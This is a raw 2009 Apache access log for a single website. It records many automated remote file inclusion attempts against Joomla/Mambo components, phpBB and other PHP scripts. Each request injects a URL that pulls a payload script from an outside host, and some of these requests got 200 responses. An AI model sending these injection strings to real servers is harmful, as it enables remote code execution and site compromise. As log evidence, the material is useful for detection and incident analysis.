85.204.231.202 - - [04/Jan/2009:08:31:35 -0800] "GET /logs/access_080330.log///appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:31:46 -0800] "GET /logs/access_081011.log///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:31:46 -0800] "GET //calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:31:46 -0800] "GET /logs///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:31:48 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:31:48 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:31:49 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:31:53 -0800] "GET /logs//index2.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:31:54 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:31:54 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:31:54 -0800] "GET /logs/access_080509.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:08:31:55 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 200 95181 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.160.185.20 - - [04/Jan/2009:08:31:59 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:32:04 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:32:04 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:32:05 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
190.196.5.189 - - [04/Jan/2009:08:32:07 -0800] "GET /logs/access_081118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:08:32:11 -0800] "GET /logs/access_080901.log/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:32:12 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
200.40.34.42 - - [04/Jan/2009:08:32:19 -0800] "GET /logs/access_071222.log/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:08:32:19 -0800] "GET /logs/access_080404.log/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:32:20 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.40.34.42 - - [04/Jan/2009:08:32:20 -0800] "GET /errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.40.34.42 - - [04/Jan/2009:08:32:20 -0800] "GET /logs/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.145.162.155 - - [04/Jan/2009:08:32:21 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 95148 "-" "libwww-perl/5.803" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:32:29 -0800] "GET /logs/default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:32:29 -0800] "GET /logs/access_080827.log///calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.1.142.10 - - [04/Jan/2009:08:32:30 -0800] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://www.grasso59.altervista.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:32:30 -0800] "GET /default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:32:33 -0800] "GET /logs/default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:32:38 -0800] "GET //calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:32:38 -0800] "GET /default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:32:42 -0800] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:32:42 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:32:42 -0800] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:32:42 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:32:43 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:32:43 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.40.34.42 - - [04/Jan/2009:08:32:43 -0800] "GET /logs/access_080227.log/errors.php?error=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.189 - - [04/Jan/2009:08:32:45 -0800] "GET /?_shop_path=http://www.leegolf.com/vboard/aid.txt?? HTTP/1.1" 200 94714 "-" "libwww-perl/5.79" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:32:46 -0800] "GET /logs///calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:32:48 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:32:48 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:32:49 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:32:53 -0800] "GET /logs/access_080613.log///canal.php?meio=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:32:53 -0800] "GET //canal.php?meio=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.79.241 - - [04/Jan/2009:08:32:54 -0800] "GET /logs/access_080213.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:32:54 -0800] "GET /logs///canal.php?meio=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.89.98 - - [04/Jan/2009:08:32:55 -0800] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://owell.us/var/https/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
67.19.89.98 - - [04/Jan/2009:08:32:55 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://owell.us/var/https/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:33:04 -0800] "GET /logs/access_080530.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:33:04 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:33:04 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95160 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:33:04 -0800] "GET /logs/access_080530.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:33:04 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:33:05 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 95160 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:33:05 -0800] "GET /logs///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:33:05 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:06 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:07 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:07 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:09 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:09 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:09 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:13 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:13 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:13 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:14 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:14 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:14 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:18 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:18 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:18 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94745 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:18 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
212.34.184.239 - - [04/Jan/2009:08:33:20 -0800] "GET /logs/access_080227.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:21 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:21 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:22 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:23 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:24 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:24 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:27 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:27 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:28 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:28 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:33:28 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:33:28 -0800] "GET /logs/access_080118.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:33:28 -0800] "GET /logs/access_080112.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:33:29 -0800] "GET /logs/access_080509.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:33:29 -0800] "GET /logs/access_080509.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
87.234.201.76 - - [04/Jan/2009:08:33:33 -0800] "GET /logs/access_080103.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:33:51 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:33:51 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:17 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:18 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:18 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:31 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:31 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:31 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:34:32 -0800] "GET /logs/access_080524.log///canal.php?meio=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:42 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:42 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:42 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:42 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:42 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:43 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94761 "-" "Mozilla/5.0" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:34:43 -0800] "GET /logs/default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:34:45 -0800] "GET /default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:46 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:46 -0800] "GET /logs/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.142.4 - - [04/Jan/2009:08:34:46 -0800] "GET /?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 200 94777 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:34:49 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
